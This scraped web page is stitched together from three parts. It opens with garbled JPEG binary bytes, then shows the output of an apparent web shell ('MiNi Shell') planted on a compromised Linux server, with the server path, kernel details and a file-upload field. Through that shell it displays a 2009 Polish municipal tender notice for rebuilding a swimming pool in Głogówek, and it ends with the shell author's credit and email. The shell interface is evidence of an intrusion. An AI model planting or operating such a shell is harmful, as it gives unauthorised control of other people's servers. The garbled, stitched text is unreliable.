JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090102/727-N-2009.html

<p class="kh_header"><b>Głogówek: BUDOWA   KĄPIELISKA  GMINNEGO  W  GŁOGÓWKU</b><br>
<b>Numer ogłoszenia: 727 - 2009; data zamieszczenia: 02.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Głogówku , ul. Rynek 1, 48-250 Głogówek, woj. opolskie, tel. 077 4069900, 4069915, faks 077 4069906.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogowek.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA   KĄPIELISKA  GMINNEGO  W  GŁOGÓWKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest BUDOWA   KĄPIELISKA  GMINNEGO  
                                    W  GŁOGÓWKU
 zlokalizowana przy ul. Kąpielowej na działce nr 692/20 , 692/25, 692/26 , 692/27, 692/28 , .m.7. 690/3,696/2,697/6,1058 
          
Przebudowa obejmuje :
-renowację 3 istniejących niecek basenowych żelbetowych oraz wymianę ich pokrycia na stal nierdzewną,
-wymianę całkowitą technologii basenu, zastosowanie atrakcji basenowych
-wykonanie 3 budynków technologicznych
-modernizacja i rozbudowa 2 budynków zaplecza basenu
-modernizacja istniejących schodów zewnętrznych i ścieżek dla pieszych
-montaż zjeżdżalni (ślimak) i wykonanie podestu do zjeżdżalni-usunięcie niektórych istniejących drzew
-wyprofilowanie istniejącej skarpy tak aby otrzymać  tarasy naziemne dla korzystania przez użytkowników basenu
-montaż elementu placu zabaw dla małych dzieci , ławek, śmietników
-wykonanie ścieżki i furtki dla niepełnosprawnych
-montaż 2 parasoli na trwałe osadzonych w gruncie
-wykonanie nowego budynku zaplecza , magazynowego
-wykonanie nowych instalacji wod-kan , elektrycznej ,gazowej, wentylacji , co , zewnętrznych i wewnętrznych
Dane techniczne:
Powierzchnia zabudowy : 						393,00 M2
Powierzchnia zabudowy istniejącego budynku zaplecza	:	82,00 m2
Powierzchnia zabudowy nowego
budynku zaplecza							146,00 m2
Powierzchnia zabudowy budynku technologicznego 1		107,00 m2
Powierzchnia zabudowy budynku technologicznego 2		35,50 m2
Powierzchnia zabudowy budynku technologicznego 3		22,50 m2
Powierzchnia basenów :					700,00 M2
-basen duży : 	                         				498,00m2
-basen średni : 						145,00 m2
-basen mały :						57,0 m2
Teren utwardzony  :					1610,00 M2
Plaża basenu :						610,00 m2
Mostek :							18,00 m2	
Chodniki : 						800,00 m2
Schody :							112,00 m2
Murki oporowe :						70,00 m2
Teren zielony :						2665,00 M2
Bilans powierzchni i wskaźników użytkowych dla budynków kąpieliska.
BASEN  DUŻY -A
Powierzchnia użytkowa :					495,00 M2 
Powierzchnia zabudowy :					530,00 M2
Kubatura :						705,00 M3

BASEN ŚREDNI - B
Powierzchnia użytkowa :					143,80 M2 
Powierzchnia zabudowy :					143,80 M2
Kubatura :						111,15 M3

BASEN MAŁY - C
Powierzchnia użytkowa :					59,00 M2 
Powierzchnia zabudowy :					59,00 M2
Kubatura :						25,00 M3
Projektowane zagospodarowanie działki.
Projekt przewiduje :
-renowację 3 istniejących niecek basenowych żelbetowych oraz wymianę ich pokrycia na stal nierdzewną,
-wymianę całkowitą technologii basenu, zastosowanie atrakcji basenowych
-wykonanie 3 budynków technologicznych , dwa z nich umieszczono pod ziemią
-modernizacja budynku zaplecza 
-modernizacja istniejących schodów zewnętrznych i ścieżek dla pieszych
-montaż zjeżdżalni (ślimak) i wykonanie podestu do zjeżdżalni
-usunięcie istniejących drzew
-usunięcie istniejącej wiaty drewnianej i garażu stalowego usytuowanego przy wiacie
-wyprofilowanie istniejącej skarpy tak aby otrzymać tarasy naziemne dla korzystania przez użytkowników basenu
-montaż elementu placu zabaw dla małych dzieci , ławek, śmietników
-wykonanie ścieżki i furtki dla niepełnosprawnych
-montaż 2 parasoli na trwałe osadzonych w gruncie
-wykonanie nowego budynku zaplecza w miejscu wiaty drewnianej , która zostanie usunięta
-wykonanie nowych instalacji wod-kan , elektrycznej , wentylacji , co , zewnętrznych i wewnętrznych
Zasadniczo zagospodarowanie terenu nie ulegnie zmianie , gdyż istniejące elementy zagospodarowania po remoncie  pozostaną w tym samym miejscu. Dodatkowo powstanie jednokondygnacyjny budynek zaplecza sanitarnego w miejscu dawnej wiaty drewnianej, która zostanie zdemontowana ze względu na zły stan techniczny.
Po usunięciu drzew zostanie ponownie wyprofilowana skarpa dla uzyskania tarasów, służących opalaniu . Plaża basenów zostanie ponownie utwardzona płytami chodnikowymi. Teren przy budynku zaplecza , ścieżka nad ścianą oporową i przy scianie oporowej zostanie utwardzona kostką brukową. 
Na skarpie przy wejściu zostanie zamontowana zjeżdżalnia ślimakowa , zjazd do basenu średniego. Wszystkie schody zewnętrzne o wysokości powyżej 50cm zostaną zaopatrzone w balustrady , tak jak skarpy i przejścia wzdłuż ściany oporowej. 
Instalacje.
Wszystkie instalacje zostaną wymienione zarówno wewnętrzne jak i zewnętrzne. Projekt przewiduje nowe przyłącze prądu, gazu oraz wymianę sieci wod - kan , deszczowej oraz technologii basenu.
Zostały zaprojektowane nowe instalacje wewnętrzne dla budynków: wod-kan, elektryczna ,co (kotłownia gazowa) , wentylacja grawitacyjna wspomagana mechanicznie.
  Obiekt będzie obsługiwany przez 2 niezależne stacje uzdatniania wody 
  (2 niezależne obiegi wody):
  Obieg I będzie obsługiwał baseny A i B oraz zjeżdżalnię wodną i brodziki 
  do płukania stóp.
  Obieg II będzie obsługiwał basen C..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 270.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. 	Zamawiający żąda wniesienia wadium w wysokości 100.000,00 PLN (słownie : sto tysięcy PLN) 
2.  Wadium należy wnieść przed upływem terminu składania ofert. 
3.  Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu ,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca winien złożyć (na załączniku nr 2 do SIWZ) oświadczenie, że spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy PZP . Wykonawca winien posiadać uprawnienia do wykonywania określonej działalności lub czynności zgodnie z art.22 Ustawy z dnia 29 stycznia 2004r.Prawo 
zamówień publicznych z pózn. zm. oraz nie podleganie wykluczeniu z postępowania o udzielenie  zamówienia na podstawie art.24 w/w ustawy  z pózn zm.
Wykonawca winien posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiazanie innych podmiotów do udostepnienia potencjału technicznego i osób  zdolnych do wykonania zamówienia.
branży: konstrukcyjno - budowlanej, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, technologii basenowej instalacji i urządzeń elektrycznych i elektroenergetycznych oraz w spec.drogowej.Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1 a/aktualny odpis z właściwego rejestru albo aktualnego zaświadczenie o wpisie do ewidencji działalności gospodarczej 1Termin wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

1.2 b/ aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  . Termin wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.1.3 c/aktualna informacja z Krajowego Rejestru Karnego w zakresie w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Pzp1.3 ,termin wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert1.4c/ aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Pzp1.4 Termin wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert2.1 wykaz robót budowlanych, zawierający rodzaj, wartość, datę i miejsce wykonania, wykonanych w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na budowie basenu kąpielowego w technologii stali nierdzewnej  i wartości brutto nie mniejszej niż 3 mln PLN. Wykonawca winien  załączyć dokument potwierdzający, że roboty te zostały wykonane należycie.   2.2 dokument stwierdzający, że wykonawca dysponuje przynajmniej po jednej osobie w każdej branży z uprawnieniami budowlanymi adekwatnymi do przedmiotu zamówienia do obsadzenia następujących stanowisk: 2.2.1 kierownik budowy - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, minimum 5 lat stażu pracy na stanowisku kierownika budów  2.2.2 kierownik robót sanitarnych z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, technologii basenowej - minimalny staż pracy od chwili uzyskania uprawnień- 5 lat 2.2.3 kierownik robót elektrycznych z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - minimalny staż pracy od chwili uzyskania uprawnień - 5 lat 2.2.4 kierownik robót drogowych w specjalności drogowej do kierowania  robotami drogowymi -minimalny staż pracy od chwili uzyskania uprawnień - 5 lat. 
Wszystkie te osoby winny przedłożyć w ofercie aktualny dokument potwierdzający przynależność do właściwej Izby Zawodowej Inżynierów

3.1 polisa, a w przypadku  jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 4 mln. PLN 
3.2 informacja banku lub spółdzielczej kasy oszczędnościowo-rozliczeniowej, w których wykonawca posiada rachunek, potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w wysokości nie mniejszej niż 30% ceny ofertowej  3.2 Termin wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogowek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogówek 48-250 Głogówek Rynek1 woj. Opolskie ,powiat Prudnik, poczta@glogowek.pl,   pokój nr.19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2009 godzina 10:00, miejsce: Ofertę należy złożyć  w siedzibie Zamawiajacego w Urzędzie Miejskim w Głogówku 
ul.Rynek 1 na I piętrze , pokój nr.13  sekretariat  , do dnia 26.01.2009r. do godz.10.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Woj. Opolskiego na lata 2007-2013

Creat By MiNi SheLL
Email: jattceo@gmail.com